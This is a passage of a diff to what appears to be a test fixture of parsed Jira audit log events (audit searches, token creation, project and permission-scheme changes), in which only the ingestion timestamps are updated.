93\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z\"}]}", + "ingested": "2021-12-15T09:00:40.254596749Z", + "original": "{\"timestamp\":\"2021-11-22T00:34:40.008Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"44 - 93\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z\"}]}", "type": "info", "kind": "event" }, @@ -195,7 +189,7 @@ }, "event": { "action": "personal.access.tokens.audit.log.summary.token.created", - "ingested": "2021-12-08T14:50:33.590204376Z", + "ingested": "2021-12-15T09:00:40.254598311Z", "original": "{\"timestamp\":\"2021-11-22T00:34:23.154Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"personal.access.tokens.audit.log.category\",\"category\":\"Security\",\"actionI18nKey\":\"personal.access.tokens.audit.log.summary.token.created\",\"action\":\"Personal access token created\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"User\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"personal.access.tokens.audit.log.extra.attribute.name\",\"name\":\"Token Name\",\"value\":\"asdf\"}]}", "type": [ "admin", @@ -265,7 +259,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590207338Z", + "ingested": "2021-12-15T09:00:40.254601187Z", "original": "{\"timestamp\":\"2021-11-22T00:32:20.234Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 40\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"40\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:33.746Z\"}]}", "type": "info", "kind": "event" @@ -335,7 +329,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590209945Z", + "ingested": "2021-12-15T09:00:40.254602524Z", "original": "{\"timestamp\":\"2021-11-22T00:31:52.991Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"41 - 90\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:33.887Z - 2021-11-22T00:31:37.412Z\"}]}", "type": "info", "kind": "event" @@ -405,7 +399,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590212585Z", + "ingested": "2021-12-15T09:00:40.254603763Z", "original": "{\"timestamp\":\"2021-11-22T00:31:37.412Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"69 - 78\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.227Z - 2021-11-22T00:08:34.249Z\"}]}", "type": "info", "kind": "event" @@ -475,7 +469,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590215181Z", + "ingested": "2021-12-15T09:00:40.254604997Z", "original": "{\"timestamp\":\"2021-11-22T00:31:26.455Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"79 - 88\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.266Z - 2021-11-22T00:30:59.449Z\"}]}", "type": "info", "kind": "event" @@ -545,7 +539,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590217809Z", + "ingested": "2021-12-15T09:00:40.254606222Z", "original": "{\"timestamp\":\"2021-11-22T00:30:59.449Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 87\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"87\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:26:03.206Z\"}]}", "type": "info", "kind": "event" @@ -615,7 +609,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590220369Z", + "ingested": "2021-12-15T09:00:40.254607495Z", "original": "{\"timestamp\":\"2021-11-22T00:26:03.206Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 86\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"86\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:12:02.856Z\"}]}", "type": "info", "kind": "event" @@ -685,7 +679,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590222928Z", + "ingested": "2021-12-15T09:00:40.254608772Z", "original": "{\"timestamp\":\"2021-11-22T00:12:02.856Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 85\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"85\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z\"}]}", "type": "info", "kind": "event" @@ -755,7 +749,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:33.590225541Z", + "ingested": "2021-12-15T09:00:40.254609976Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.545Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 3.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10002\",\"id\":\"10002\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 3.0\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -825,7 +819,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:33.590228415Z", + "ingested": "2021-12-15T09:00:40.254611358Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.543Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 2.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10001\",\"id\":\"10001\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 2.0\"},{\"key\":\"Release date\",\"i18nKey\":\"version.releasedate\",\"to\":\"2021-11-28\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -900,7 +894,7 @@ }, "event": { "action": "jira.auditing.version.released", - "ingested": "2021-12-08T14:50:33.590231031Z", + "ingested": "2021-12-15T09:00:40.254612544Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.535Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.released\",\"action\":\"Project version released\"},\"affectedObjects\":[{\"name\":\"Version 1.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10000\",\"id\":\"10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -963,7 +957,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:33.590233642Z", + "ingested": "2021-12-15T09:00:40.254613775Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.521Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 1.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10000\",\"id\":\"10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 1.0\"},{\"key\":\"Release date\",\"i18nKey\":\"version.releasedate\",\"to\":\"2021-11-14\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1038,7 +1032,7 @@ }, "event": { "action": "jira.auditing.project.roles.changed", - "ingested": "2021-12-08T14:50:33.590236188Z", + "ingested": "2021-12-15T09:00:40.254614952Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.506Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.project.roles.changed\",\"action\":\"Project roles changed\"},\"affectedObjects\":[{\"name\":\"Developers\",\"type\":\"PROJECT_ROLE\",\"id\":\"10100\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Users\",\"i18nKey\":\"admin.common.words.users\",\"to\":\"JIRAUSER10000\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1107,7 +1101,7 @@ }, "event": { "action": "jira.auditing.project.created", - "ingested": "2021-12-08T14:50:33.590238784Z", + "ingested": "2021-12-15T09:00:40.254616175Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.297Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.project.created\",\"action\":\"Project created\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Default Assignee\",\"i18nKey\":\"admin.projects.default.assignee\",\"to\":\"Unassigned\"},{\"key\":\"Description\",\"i18nKey\":\"common.concepts.description\",\"to\":\"\"},{\"key\":\"Key\",\"i18nKey\":\"common.words.key\",\"to\":\"TEST\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"test\"},{\"key\":\"Project Lead\",\"i18nKey\":\"common.concepts.projectlead\",\"to\":\"test.user\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" @@ -1201,7 +1195,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.added.to.project", - "ingested": "2021-12-08T14:50:33.590251796Z", + "ingested": "2021-12-15T09:00:40.254617497Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.266Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.added.to.project\",\"action\":\"Permission scheme added to project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1264,7 +1258,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.removed.from.project", - "ingested": "2021-12-08T14:50:33.590254678Z", + "ingested": "2021-12-15T09:00:40.254618819Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.249Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"action\":\"Permission scheme removed from project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "deletion" @@ -1333,7 +1327,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590257281Z", + "ingested": "2021-12-15T09:00:40.254619999Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.243Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1402,7 +1396,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590266789Z", + "ingested": "2021-12-15T09:00:40.254621286Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.241Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Start/Complete Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1471,7 +1465,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590269733Z", + "ingested": "2021-12-15T09:00:40.254622525Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.239Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1540,7 +1534,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590272430Z", + "ingested": "2021-12-15T09:00:40.254623855Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.236Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Development Tools\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1609,7 +1603,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590275077Z", + "ingested": "2021-12-15T09:00:40.254625130Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.235Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Transition Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1678,7 +1672,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590277891Z", + "ingested": "2021-12-15T09:00:40.254626534Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.233Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Read-Only Workflow\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1747,7 +1741,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": 